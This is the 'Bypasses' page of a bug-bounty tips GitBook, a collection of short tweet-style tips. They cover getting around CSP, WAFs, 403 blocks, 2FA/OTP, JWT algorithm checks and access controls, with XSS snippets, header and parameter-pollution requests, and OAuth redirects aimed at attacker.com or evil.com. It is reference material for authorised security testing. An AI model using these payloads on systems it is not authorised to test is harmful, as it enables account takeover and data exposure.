Book of BugBounty Tips
Search…
Introduction
OSINT / Recon
API
Cross Site Request Forgery (CSRF)
Server Side Request Forgery (SSRF)
Sensitive Information Disclosure
Cross Site Scripting (XSS)
CRLF
Remote Code Execution (RCE)
Email Related
File Upload
Open Redirect
IDOR
Injection
XXE
Local / Remote File Inclusion
Authentication / Authorization
Account Takeover
Application Login
Clickjacking
Parameter Pollution
Fuzzing
Application Logic Bypasses
Bypasses
Mobile
Password Reset
Web Cache
Server Side Template Injection
Tips from @EdOverflow
Tips From @intigriti
Hackpack From @yeswehack
Tips from @YogoshaOfficial
Tips from @Jhaddix
Tips from Ben
Tips from Other Sources
Tips from Blog posts / other hunters
Others
Bugbounty Related Websites / Blogs
Twitter Threads
Docker and k8s
Tweets Collection by @Pentesterland
Windows
Linux
Burp suite
Scope Based Recon Tips
Powered By
GitBook
Bypasses
It's possible to bypass #CSP with the following : #JSONP: <script src="https://trustedsite/jsonp?callback=payload"> #AngularJS <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>
Encountered with AWS WAF? Just add "<!" (without quotes) before your payload and bypass that WAF. :) eg: <!alert(1) #BugBounty #bugbountytip #bugbountytips
If the target is using @Cloudflare , dig in their DNS records and search for the origins IP address. If you attack the application directly by his IP’s cloudflare WAF will not be there.
Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc. iFrame with javascript URI payload. Line feeds [CRLF] obfuscate it.
Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ … #bugbountytip
Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty
When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.
CSP Bypass, script-src 'self' data: -
https://twitter.com/404death/status/1191222237782659072
Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter
.
I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips Last /setup/ endpoint was by attacker while the first one is as victim.
OTP bypass -
https://twitter.com/HackerHumble
sometimes you find those PATHs that forwards to a login page & you can't see the content inside them. (ex: /path/to/secret --> Google login)
Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if
http://foo.foo
is claimed.
https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/
#bugbountytip
Cloudfront Bypass -
403 Bypass:
https://twitter.com/RathiArpeet/status/1315593774773334016
https://twitter.com/hackerscrolls/status/1254701239360720900
Tool -
https://github.com/lobuhi/byp4xx
h
ttps://github.com/Raywando/4xxbypass
https://github.com/sting8k/BurpSuite_403Bypasser
if “origin” header not work, try with “x-[org name]-origin”, same think for all headers!! e.g x-uber-origin, x-uber-host,..etc
#bugbounty I Was able to bypass the Filter on OAUTH through FUZZ With URL-Encode Chars , Found that Website Add / before %5b when redirect the token Example : target/oauth?redirect_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect Token to : http://Attacker.com/%5b.target.comrget.com?token=…...
Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.
What worked was... \udfff -> � -> ?
Therefore... {"redirectUri":"https://attacker\
[email protected]
[victim]/"}
Equals... Location: https://
[email protected]
[victim]/
JWT Token Bypasses #2:
1.
Capture the JWT token.
2.
If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting jwks Uri / mostly it will be the public key from the site's https certificate) (1/2)
Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header. POST /admin/deleteUser HTTP/1.1 -> 403 POST / HTTP/1.1 X-Original-URL: /admin/deleteUser -> 200OK Bypass Success! #bugbounty #bu
gbountytip
Price Manipulation -
https://twitter.com/SalahHasoneh1/status/1284869760921014274?s=20
{“id”:111} --> 401 Unauthriozied {“id”:{“id”:111}} --> 200 OK
POST /api/get_profile Content-Type: application/json {“user_id”:,”user_id”:}
GET /api_v1/messages?user_id=VICTIM_ID --> 401
GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK
How to find authentication bypass vulnerabilities. Focus. I Added headers.
Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized
Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found
CSP -
So: Site allows external '.css' stylesheets? Inject your XSS on your local 'style.css' an call it from external "<svg><link href=//evil.com/style.css>" XSS will be injected in the html! (CSP it's on? but no style-src?) so hit the box dude! #bugbounty #infosec
https://twitter.com/iam_j0ker/status/1303658167205728256?s=20
CSP - Hates CSP? Me too I found HTML Injection in Bugcrowd Private (can't trigger script because of CSP). Staff change state to P5 (Content Spoofing).
But I can raise it again to P3 (Iframe Injection) and Triaged.
<iframe src= blocked by CSP
Solution:
<iframe srcdoc=
Auth bypass tip:
/api/ -> 403 Fuzzing -> not working Try: /api/application.wadl?detail=true
Found:
/api/etc/projects/{id} /api/etc/users/{id} /api/etc/admin/ Impact:[ + ] PII Info disclosure [ + ] Sensitive info leak [ + ] Access admin endpoint #bugbantytips #bugbountytips
1. Found a subdomain with 404 error 2. Added /api ==> 401 error 3. Using FFUF find /api/v2/users endpoint. But still forbidden. 4. Bypass api protection using / ===> //api/v2/users Boom!! PII of internal user disclosure. #bugbounty #cybersecurity #infosec #bugbountytips
Previous
Application Logic Bypasses
Next
Mobile
Last modified
8mo ago
Copy link